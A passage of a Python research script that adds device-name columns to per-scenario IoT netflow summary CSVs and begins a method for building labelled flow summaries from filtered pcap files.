    # rejected, known ones merged in, then the raw kwargs dict dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_sync_job_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'synch_job_id' is set
    if ('synch_job_id' not in params) or (params['synch_job_id'] is None):
        raise ValueError("Missing the required parameter `synch_job_id` when calling `get_sync_job_by_id`")

    # The job id is interpolated into the path, not the query string.
    resource_path = '/synchJobs/{synchJob-ID}'.replace('{format}', 'json')
    path_params = {}
    if 'synch_job_id' in params:
        path_params['synchJob-ID'] = params['synch_job_id']

    query_params = {}
    if 'organizations' in params:
        query_params['organizations'] = params['organizations']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` (dropped again if negotiation yields nothing)
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['text/plain'])

    # Authentication setting
    auth_settings = []

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_scope(self, scope, **kwargs):
    """
    Returns a collection jobs, specified by the scope parameter.
    {\"nickname\":\"Retrieve by scope\",\"response\":\"getSyncJobByScope.html\"}
    Convenience wrapper around `get_sync_job_by_scope_with_http_info` that
    returns only the response data.  Supplying a `callback` keyword makes the
    HTTP request asynchronous, in which case the request thread is returned.
    :param callback function: The callback function for asynchronous request. (optional)
    :param str scope: The scope of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both returned the same delegated call; collapsed.
    return self.get_sync_job_by_scope_with_http_info(scope, **kwargs)
def get_sync_job_by_scope_with_http_info(self, scope, **kwargs):
    """
    Returns a collection jobs, specified by the scope parameter.
    {\"nickname\":\"Retrieve by scope\",\"response\":\"getSyncJobByScope.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_sync_job_by_scope_with_http_info(scope, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str scope: The scope of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # Auto-generated by swagger-codegen; edits here diverge from the spec.
    all_params = ['scope', 'organizations']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `locals()` snapshots the declared parameters; unknown kwargs are
    # rejected, known ones merged in, then the raw kwargs dict dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_sync_job_by_scope" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'scope' is set
    if ('scope' not in params) or (params['scope'] is None):
        raise ValueError("Missing the required parameter `scope` when calling `get_sync_job_by_scope`")

    # The scope is interpolated into the path, not the query string.
    resource_path = '/synchJobs/scope/{scope}'.replace('{format}', 'json')
    path_params = {}
    if 'scope' in params:
        path_params['scope'] = params['scope']

    query_params = {}
    if 'organizations' in params:
        query_params['organizations'] = params['organizations']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` (dropped again if negotiation yields nothing)
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['text/plain'])

    # Authentication setting
    auth_settings = []

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_state(self, state, **kwargs):
    """
    Returns a collection jobs, specified by the state parameter.
    {\"nickname\":\"Retrieve by state\",\"response\":\"getSyncJobByState.html\"}
    Convenience wrapper around `get_sync_job_by_state_with_http_info` that
    returns only the response data.  Supplying a `callback` keyword makes the
    HTTP request asynchronous, in which case the request thread is returned.
    :param callback function: The callback function for asynchronous request. (optional)
    :param str state: The state of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both returned the same delegated call; collapsed.
    return self.get_sync_job_by_state_with_http_info(state, **kwargs)
def get_sync_job_by_state_with_http_info(self, state, **kwargs):
    """
    Returns a collection jobs, specified by the state parameter.
    {\"nickname\":\"Retrieve by state\",\"response\":\"getSyncJobByState.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_sync_job_by_state_with_http_info(state, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str state: The state of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # Auto-generated by swagger-codegen; edits here diverge from the spec.
    all_params = ['state', 'organizations']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `locals()` snapshots the declared parameters; unknown kwargs are
    # rejected, known ones merged in, then the raw kwargs dict dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_sync_job_by_state" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'state' is set
    if ('state' not in params) or (params['state'] is None):
        raise ValueError("Missing the required parameter `state` when calling `get_sync_job_by_state`")

    # The state is interpolated into the path, not the query string.
    resource_path = '/synchJobs/state/{state}'.replace('{format}', 'json')
    path_params = {}
    if 'state' in params:
        path_params['state'] = params['state']

    query_params = {}
    if 'organizations' in params:
        query_params['organizations'] = params['organizations']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` (dropped again if negotiation yields nothing)
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['text/plain'])

    # Authentication setting
    auth_settings = []

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_target(self, target, **kwargs):
    """
    Returns a collection jobs, specified by the target parameter.
    {\"nickname\":\"Retrieve by target\",\"response\":\"getSyncJobByTarget.html\"}
    Convenience wrapper around `get_sync_job_by_target_with_http_info` that
    returns only the response data.  Supplying a `callback` keyword makes the
    HTTP request asynchronous, in which case the request thread is returned.
    :param callback function: The callback function for asynchronous request. (optional)
    :param str target: The target of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both returned the same delegated call; collapsed.
    return self.get_sync_job_by_target_with_http_info(target, **kwargs)
def get_sync_job_by_target_with_http_info(self, target, **kwargs):
    """
    Returns a collection jobs, specified by the target parameter.
    {\"nickname\":\"Retrieve by target\",\"response\":\"getSyncJobByTarget.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.get_sync_job_by_target_with_http_info(target, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str target: The target of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keywords this endpoint accepts; anything else is rejected.
    all_params = ['target', 'organizations']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Swagger-codegen idiom: snapshot locals() (self, target, kwargs) and fold
    # the validated kwargs into it so all inputs are read from one dict below.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_sync_job_by_target" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'target' is set
    if ('target' not in params) or (params['target'] is None):
        raise ValueError("Missing the required parameter `target` when calling `get_sync_job_by_target`")
    resource_path = '/synchJobs/target/{target}'.replace('{format}', 'json')
    # `target` travels in the URL path; `organizations` as a query string.
    path_params = {}
    if 'target' in params:
        path_params['target'] = params['target']
    query_params = {}
    if 'organizations' in params:
        query_params['organizations'] = params['organizations']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['text/plain'])
    # Authentication setting
    auth_settings = []
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_type(self, type, **kwargs):
    """
    Returns a collection jobs, specified by the type parameter.
    {\"nickname\":\"Retrieve by type\",\"response\":\"getSyncJobByType.html\"}

    Synchronous by default; supply a `callback` keyword argument to make the
    request asynchronously and receive the request thread instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str type: The type of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns either the deserialized
    # data (sync) or the request thread (async callback), so the original
    # if/else over `callback` collapses into one forwarding call.
    return self.get_sync_job_by_type_with_http_info(type, **kwargs)
def get_sync_job_by_type_with_http_info(self, type, **kwargs):
    """
    Returns a collection jobs, specified by the type parameter.
    {\"nickname\":\"Retrieve by type\",\"response\":\"getSyncJobByType.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.get_sync_job_by_type_with_http_info(type, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str type: The type of the synch job. (required)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keywords this endpoint accepts; anything else is rejected.
    all_params = ['type', 'organizations']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Swagger-codegen idiom: snapshot locals() (self, type, kwargs) and fold
    # the validated kwargs into it so all inputs are read from one dict below.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_sync_job_by_type" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'type' is set
    if ('type' not in params) or (params['type'] is None):
        raise ValueError("Missing the required parameter `type` when calling `get_sync_job_by_type`")
    resource_path = '/synchJobs/type/{type}'.replace('{format}', 'json')
    # `type` travels in the URL path; `organizations` as a query string.
    path_params = {}
    if 'type' in params:
        path_params['type'] = params['type']
    query_params = {}
    if 'organizations' in params:
        query_params['organizations'] = params['organizations']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['text/plain'])
    # Authentication setting
    auth_settings = []
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def update_sync_job(self, synch_job, **kwargs):
    """
    Update a synch job.
    {\"nickname\":\"Update a synch job\",\"request\":\"updateSyncJobRequest.html\",\"response\":\"updateSyncJobResponse.html\"}

    Synchronous by default; supply a `callback` keyword argument to make the
    request asynchronously and receive the request thread instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param MutableBillingEntity synch_job: The synch job object to be updated. (required)
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns either the deserialized
    # data (sync) or the request thread (async callback), so the original
    # if/else over `callback` collapses into one forwarding call.
    return self.update_sync_job_with_http_info(synch_job, **kwargs)
def update_sync_job_with_http_info(self, synch_job, **kwargs):
    """
    Update a synch job.
    {\"nickname\":\"Update a synch job\",\"request\":\"updateSyncJobRequest.html\",\"response\":\"updateSyncJobResponse.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.update_sync_job_with_http_info(synch_job, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param MutableBillingEntity synch_job: The synch job object to be updated. (required)
    :return: DataSynchronizationJobPagedMetadata
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keywords this endpoint accepts; anything else is rejected.
    all_params = ['synch_job']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Swagger-codegen idiom: snapshot locals() (self, synch_job, kwargs) and
    # fold the validated kwargs into it so all inputs come from one dict below.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_sync_job" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'synch_job' is set
    if ('synch_job' not in params) or (params['synch_job'] is None):
        raise ValueError("Missing the required parameter `synch_job` when calling `update_sync_job`")
    resource_path = '/synchJobs'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # The synch job object is serialized as the PUT request body.
    body_params = None
    if 'synch_job' in params:
        body_params = params['synch_job']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['text/xml', 'application/xml', 'application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = []
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
| 43.157034
| 136
| 0.582817
| 4,173
| 39,575
| 5.317757
| 0.059909
| 0.057681
| 0.018025
| 0.02163
| 0.927854
| 0.916002
| 0.901942
| 0.894236
| 0.874454
| 0.867649
| 0
| 0.000529
| 0.331371
| 39,575
| 916
| 137
| 43.204148
| 0.838101
| 0.385951
| 0
| 0.747642
| 1
| 0
| 0.167173
| 0.049867
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040094
| false
| 0
| 0.016509
| 0
| 0.115566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c192141d46e6c38640c54bee3d0da46bd8b6f655
| 498
|
py
|
Python
|
Session-2/Conditions/S2C2.py
|
saianuragpeddu/python-assignemts
|
a6bb192f2c0ef8ea86531c1a98f1b76150fa474b
|
[
"MIT"
] | null | null | null |
Session-2/Conditions/S2C2.py
|
saianuragpeddu/python-assignemts
|
a6bb192f2c0ef8ea86531c1a98f1b76150fa474b
|
[
"MIT"
] | null | null | null |
Session-2/Conditions/S2C2.py
|
saianuragpeddu/python-assignemts
|
a6bb192f2c0ef8ea86531c1a98f1b76150fa474b
|
[
"MIT"
] | 1
|
2019-07-06T02:37:58.000Z
|
2019-07-06T02:37:58.000Z
|
def isIsosceles(x, y, z):
    """Return True when all three side lengths are positive and at least two are equal."""
    if min(x, y, z) <= 0:
        return False
    return x == y or y == z or x == z


print(isIsosceles(-2, -2, 3))
print(isIsosceles(2, 3, 2))
def isIsosceles(x, y, z):
    """True for positive side lengths with at least one matching pair of sides."""
    all_positive = x > 0 and y > 0 and z > 0
    has_equal_pair = x == y or y == z or x == z
    return all_positive and has_equal_pair


print(isIsosceles(-2, -2, 3))
print(isIsosceles(2, 3, 2))
| 18.444444
| 36
| 0.506024
| 84
| 498
| 3
| 0.190476
| 0.031746
| 0.269841
| 0.126984
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0
| 0.055901
| 0.353414
| 498
| 26
| 37
| 19.153846
| 0.726708
| 0
| 0
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.454545
| 0.181818
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c1b8aae057f65bb8fc5b422483ca4fcf66bbb362
| 249
|
py
|
Python
|
tcrdist/tests/test_translation.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 26
|
2020-12-28T17:37:01.000Z
|
2022-01-29T01:31:13.000Z
|
tcrdist/tests/test_translation.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 31
|
2020-08-17T22:17:57.000Z
|
2022-03-18T23:47:34.000Z
|
tcrdist/tests/test_translation.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 7
|
2020-08-18T23:55:40.000Z
|
2021-09-22T18:15:54.000Z
|
import pytest
"""
Unit Tests for translation.py
"""
def test_reverse_compliment():
    # NOTE(review): the test name misspells "complement"; renaming would change
    # which test pytest reports, so it is left as-is.
    from tcrdist.translation import reverse_complement
    # Plain reverse-complement of a DNA string.
    assert reverse_complement(seq = 'ATGC') == 'GCAT'
    # Non-nucleotide characters (here '.') are carried through, reversed in place.
    assert reverse_complement(seq = 'AT.GC') == 'GC.AT'
| 24.9
| 55
| 0.718876
| 31
| 249
| 5.612903
| 0.645161
| 0.293103
| 0.264368
| 0.298851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156627
| 249
| 9
| 56
| 27.666667
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0.085308
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1be93dfe72dc16a8f17f075e9c7c80a454fceeb
| 1,841
|
py
|
Python
|
classification/torch_codes/net.py
|
sansastra/uncertainty_edl_graph
|
21c20bef323b520f6031ca54c2eb1fd020841f9d
|
[
"Apache-2.0"
] | 4
|
2021-08-09T20:46:22.000Z
|
2022-03-23T15:58:30.000Z
|
classification/torch_codes/net.py
|
sansastra/uncertainty_edl_graph
|
21c20bef323b520f6031ca54c2eb1fd020841f9d
|
[
"Apache-2.0"
] | null | null | null |
classification/torch_codes/net.py
|
sansastra/uncertainty_edl_graph
|
21c20bef323b520f6031ca54c2eb1fd020841f9d
|
[
"Apache-2.0"
] | 1
|
2021-11-02T14:29:51.000Z
|
2021-11-02T14:29:51.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
class Net_30(nn.Module):
    """Fully connected classifier: input -> hidden -> hidden -> hidden//2 -> output.

    Hidden layers use ReLU; the output layer also passes through ReLU (a
    sigmoid variant is kept commented out in ``forward``), so outputs are
    non-negative. When ``dropout`` is True, dropout is applied after each
    hidden activation while the module is in training mode.
    """

    def __init__(self, dropout=False, input_size=60, hidden_layer_size=128, output_size=2):
        """
        :param dropout: apply F.dropout after every hidden activation
        :param input_size: number of input features
        :param hidden_layer_size: width of the first two hidden layers
        :param output_size: number of output units
        """
        super().__init__()
        # Original code assigned self.use_dropout three times; once suffices.
        self.use_dropout = dropout
        self.fc1 = nn.Linear(input_size, hidden_layer_size)
        self.fc2 = nn.Linear(hidden_layer_size, hidden_layer_size)
        self.fc3 = nn.Linear(hidden_layer_size, hidden_layer_size // 2)
        self.fc4 = nn.Linear(hidden_layer_size // 2, output_size)

    def forward(self, x):
        """Forward pass; returns a non-negative tensor of shape (..., output_size)."""
        for hidden in (self.fc1, self.fc2, self.fc3):
            x = F.relu(hidden(x))
            if self.use_dropout:
                x = F.dropout(x, training=self.training)
        # x = torch.sigmoid(self.fc4(x))
        x = torch.relu(self.fc4(x))
        return x
class Net_OOS(nn.Module):
    """Fully connected classifier with one fewer hidden layer than Net_30.

    Layers: input -> hidden (fc1) -> hidden//2 (fc3) -> output (fc4).
    Hidden layers use ReLU; the output layer also passes through ReLU (a
    sigmoid variant is kept commented out in ``forward``), so outputs are
    non-negative. When ``dropout`` is True, dropout is applied after each
    hidden activation while the module is in training mode.
    """

    def __init__(self, dropout=False, input_size=60*4, hidden_layer_size=128, output_size=2):
        """
        :param dropout: apply F.dropout after every hidden activation
        :param input_size: number of input features (default 240)
        :param hidden_layer_size: width of the first hidden layer
        :param output_size: number of output units
        """
        super().__init__()
        # Original code assigned self.use_dropout twice; once suffices.
        self.use_dropout = dropout
        # Layer names fc1/fc3/fc4 are kept so state_dict keys stay compatible.
        self.fc1 = nn.Linear(input_size, hidden_layer_size)
        self.fc3 = nn.Linear(hidden_layer_size, hidden_layer_size // 2)
        self.fc4 = nn.Linear(hidden_layer_size // 2, output_size)

    def forward(self, x):
        """Forward pass; returns a non-negative tensor of shape (..., output_size)."""
        for hidden in (self.fc1, self.fc3):
            x = F.relu(hidden(x))
            if self.use_dropout:
                x = F.dropout(x, training=self.training)
        # x = torch.sigmoid(self.fc4(x))
        x = torch.relu(self.fc4(x))
        return x
| 33.472727
| 93
| 0.625747
| 273
| 1,841
| 4
| 0.153846
| 0.120879
| 0.164835
| 0.086996
| 0.895604
| 0.895604
| 0.895604
| 0.895604
| 0.878205
| 0.878205
| 0
| 0.025473
| 0.253666
| 1,841
| 54
| 94
| 34.092593
| 0.769287
| 0.033134
| 0
| 0.767442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.093023
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e718c5b220de94891b388894e795174435b6c09e
| 267
|
py
|
Python
|
openslides_backend/action/committee/__init__.py
|
reiterl/openslides-backend
|
d36667f00087ae8baf25853d4cef18a5e6dc7b3b
|
[
"MIT"
] | null | null | null |
openslides_backend/action/committee/__init__.py
|
reiterl/openslides-backend
|
d36667f00087ae8baf25853d4cef18a5e6dc7b3b
|
[
"MIT"
] | null | null | null |
openslides_backend/action/committee/__init__.py
|
reiterl/openslides-backend
|
d36667f00087ae8baf25853d4cef18a5e6dc7b3b
|
[
"MIT"
] | null | null | null |
from ..base import DummyAction
from ..register import register_action
from . import create # noqa
@register_action("committee.update")
class CommitteeUpdate(DummyAction):
pass
@register_action("committee.delete")
class CommitteeDelete(DummyAction):
pass
| 19.071429
| 38
| 0.779026
| 29
| 267
| 7.068966
| 0.517241
| 0.204878
| 0.22439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131086
| 267
| 13
| 39
| 20.538462
| 0.883621
| 0.014981
| 0
| 0.222222
| 0
| 0
| 0.122605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.222222
| 0.333333
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e7433efbf6c922a17c992011ec239e2b1f62958d
| 34,741
|
py
|
Python
|
scripts/adding_more_information/adding_more_information_netflow.py
|
mrjojo11/malpaca-pub
|
26fd3a7045288bed66d624e0f5593067ff05952d
|
[
"MIT"
] | null | null | null |
scripts/adding_more_information/adding_more_information_netflow.py
|
mrjojo11/malpaca-pub
|
26fd3a7045288bed66d624e0f5593067ff05952d
|
[
"MIT"
] | null | null | null |
scripts/adding_more_information/adding_more_information_netflow.py
|
mrjojo11/malpaca-pub
|
26fd3a7045288bed66d624e0f5593067ff05952d
|
[
"MIT"
] | null | null | null |
import csv
import glob
import math
import os
import sys
from random import random, seed
import socket
from timeit import default_timer as timer
import time
from statistics import mean
from pathlib import Path
import networkx as nx
import numpy as np
from scapy.layers.inet import IP, UDP
from scapy.utils import PcapWriter, PcapReader
import tkinter as tk
from tkinter import filedialog
import zat
from zat.log_to_dataframe import LogToDataFrame
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
from matplotlib.pyplot import cm
import matplotlib.transforms as mtrans
class Adding_More_Information_Netflow():
@staticmethod
def adding_name_info_and_rename_labels_of_benign_devices_for_netflow(path_to_filtered_files, path_to_name_info):
    """
    Add a device "name" column to every per-file summary CSV.

    Reads scan_order.txt for the (scenario, file) pairs, looks each scenario
    up in the name-info CSV (columns: scenario_name, name), writes the matched
    name into that file's summary CSV and reorders its columns.

    NOTE(review): despite the method name, no label renaming happens in this
    body — only the name column is added.

    :param path_to_filtered_files: root folder holding scan_order.txt and the
        per-scenario/<file>/<file>_summary.csv files
    :param path_to_name_info: CSV mapping scenario_name -> name
    """
    # (Removed two no-op self-assignments of the parameters.)
    name_info_df = pd.read_csv(path_to_name_info)
    scan_file_order_path = path_to_filtered_files + "/scan_order.txt"
    with open(scan_file_order_path, 'r') as inputfile:
        scanned_files = inputfile.readlines()
    scanned_files_list = [x.strip() for x in scanned_files]
    scanned_files_list = [(x.split(",")[0], x.split(",")[1]) for x in scanned_files_list]
    # Output column order is loop-invariant; build it once.
    columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "scenario", "file",
                    "connection_length", "label", "detailed_label",
                    "detailed_label_count", "name", "status"]
    for index, (scenario, file_name) in enumerate(scanned_files_list):
        print("Scenario " + str(index + 1) + "/" + str(len(scanned_files_list)))
        name = name_info_df[name_info_df["scenario_name"] == scenario]["name"].values[0]
        path_to_csv_file = path_to_filtered_files + "/" + scenario + "/" + file_name + "/" + file_name + "_summary.csv"
        summary_csv_df = pd.read_csv(path_to_csv_file)
        summary_csv_df["name"] = name
        summary_csv_df = summary_csv_df.reindex(columns=columns_list)
        summary_csv_df.to_csv(path_to_csv_file, index=False)
@staticmethod
def create_summary_from_separate_files_for_netflow(path_to_iot_scenarios_folder, folder_to_filtered_files, filename_addition):
    """
    Build a per-file netflow summary CSV for every (scenario, file) pair in
    scan_order.txt.

    For each filtered pcap the method counts packets per
    (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos) flow, then tries
    to attach Zeek/Bro labels from the scenario's "bro" folder. Flows found
    directly get status "Found"; flows only matched with src/dst reversed get
    "Response"; flows with conflicting labels get "Mixed"; unmatched flows (or
    scenarios without bro labels) get "Unknown".

